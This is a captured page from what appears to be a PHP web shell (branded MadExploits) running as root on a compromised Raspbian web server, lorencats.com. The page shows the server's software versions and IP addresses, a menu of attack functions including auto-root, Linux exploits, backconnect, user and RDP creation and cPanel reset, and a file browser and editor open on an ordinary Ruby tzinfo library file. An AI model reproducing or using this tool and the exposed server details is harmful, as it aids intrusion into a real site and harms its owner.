Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
tzinfo /
[ HOME SHELL ]
Name
Size
Permission
Action
country.rb
6.1
KB
-rw-r--r--
country_index_definition.rb
962
B
-rw-r--r--
country_info.rb
1.14
KB
-rw-r--r--
country_timezone.rb
5
KB
-rw-r--r--
data_source.rb
6.94
KB
-rw-r--r--
data_timezone.rb
2.14
KB
-rw-r--r--
data_timezone_info.rb
2.01
KB
-rw-r--r--
info_timezone.rb
571
B
-rw-r--r--
linked_timezone.rb
2.36
KB
-rw-r--r--
linked_timezone_info.rb
835
B
-rw-r--r--
offset_rationals.rb
3.64
KB
-rw-r--r--
ruby_core_support.rb
4.57
KB
-rw-r--r--
ruby_country_info.rb
2.44
KB
-rw-r--r--
ruby_data_source.rb
4.15
KB
-rw-r--r--
time_or_datetime.rb
10.46
KB
-rw-r--r--
timezone.rb
24.99
KB
-rw-r--r--
timezone_definition.rb
981
B
-rw-r--r--
timezone_index_definition.rb
1.6
KB
-rw-r--r--
timezone_info.rb
747
B
-rw-r--r--
timezone_offset.rb
3.72
KB
-rw-r--r--
timezone_period.rb
8.76
KB
-rw-r--r--
timezone_proxy.rb
3.7
KB
-rw-r--r--
timezone_transition.rb
4.28
KB
-rw-r--r--
timezone_transition_definition...
3.76
KB
-rw-r--r--
transition_data_timezone_info....
9.67
KB
-rw-r--r--
zoneinfo_country_info.rb
1.19
KB
-rw-r--r--
zoneinfo_data_source.rb
19.12
KB
-rw-r--r--
zoneinfo_timezone_info.rb
11.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : offset_rationals.rb
require 'rational' unless defined?(Rational) module TZInfo # Provides a method for getting Rationals for a timezone offset in seconds. # Pre-reduced rationals are returned for all the half-hour intervals between # -14 and +14 hours to avoid having to call gcd at runtime. # # @private module OffsetRationals #:nodoc: @@rational_cache = { -50400 => RubyCoreSupport.rational_new!(-7,12), -48600 => RubyCoreSupport.rational_new!(-9,16), -46800 => RubyCoreSupport.rational_new!(-13,24), -45000 => RubyCoreSupport.rational_new!(-25,48), -43200 => RubyCoreSupport.rational_new!(-1,2), -41400 => RubyCoreSupport.rational_new!(-23,48), -39600 => RubyCoreSupport.rational_new!(-11,24), -37800 => RubyCoreSupport.rational_new!(-7,16), -36000 => RubyCoreSupport.rational_new!(-5,12), -34200 => RubyCoreSupport.rational_new!(-19,48), -32400 => RubyCoreSupport.rational_new!(-3,8), -30600 => RubyCoreSupport.rational_new!(-17,48), -28800 => RubyCoreSupport.rational_new!(-1,3), -27000 => RubyCoreSupport.rational_new!(-5,16), -25200 => RubyCoreSupport.rational_new!(-7,24), -23400 => RubyCoreSupport.rational_new!(-13,48), -21600 => RubyCoreSupport.rational_new!(-1,4), -19800 => RubyCoreSupport.rational_new!(-11,48), -18000 => RubyCoreSupport.rational_new!(-5,24), -16200 => RubyCoreSupport.rational_new!(-3,16), -14400 => RubyCoreSupport.rational_new!(-1,6), -12600 => RubyCoreSupport.rational_new!(-7,48), -10800 => RubyCoreSupport.rational_new!(-1,8), -9000 => RubyCoreSupport.rational_new!(-5,48), -7200 => RubyCoreSupport.rational_new!(-1,12), -5400 => RubyCoreSupport.rational_new!(-1,16), -3600 => RubyCoreSupport.rational_new!(-1,24), -1800 => RubyCoreSupport.rational_new!(-1,48), 0 => RubyCoreSupport.rational_new!(0,1), 1800 => RubyCoreSupport.rational_new!(1,48), 3600 => RubyCoreSupport.rational_new!(1,24), 5400 => RubyCoreSupport.rational_new!(1,16), 7200 => RubyCoreSupport.rational_new!(1,12), 9000 => RubyCoreSupport.rational_new!(5,48), 10800 => RubyCoreSupport.rational_new!(1,8), 12600 => RubyCoreSupport.rational_new!(7,48), 14400 => RubyCoreSupport.rational_new!(1,6), 16200 => RubyCoreSupport.rational_new!(3,16), 18000 => RubyCoreSupport.rational_new!(5,24), 19800 => RubyCoreSupport.rational_new!(11,48), 21600 => RubyCoreSupport.rational_new!(1,4), 23400 => RubyCoreSupport.rational_new!(13,48), 25200 => RubyCoreSupport.rational_new!(7,24), 27000 => RubyCoreSupport.rational_new!(5,16), 28800 => RubyCoreSupport.rational_new!(1,3), 30600 => RubyCoreSupport.rational_new!(17,48), 32400 => RubyCoreSupport.rational_new!(3,8), 34200 => RubyCoreSupport.rational_new!(19,48), 36000 => RubyCoreSupport.rational_new!(5,12), 37800 => RubyCoreSupport.rational_new!(7,16), 39600 => RubyCoreSupport.rational_new!(11,24), 41400 => RubyCoreSupport.rational_new!(23,48), 43200 => RubyCoreSupport.rational_new!(1,2), 45000 => RubyCoreSupport.rational_new!(25,48), 46800 => RubyCoreSupport.rational_new!(13,24), 48600 => RubyCoreSupport.rational_new!(9,16), 50400 => RubyCoreSupport.rational_new!(7,12)}.freeze # Returns a Rational expressing the fraction of a day that offset in # seconds represents (i.e. equivalent to Rational(offset, 86400)). def rational_for_offset(offset) @@rational_cache[offset] || Rational(offset, 86400) end module_function :rational_for_offset end end
Close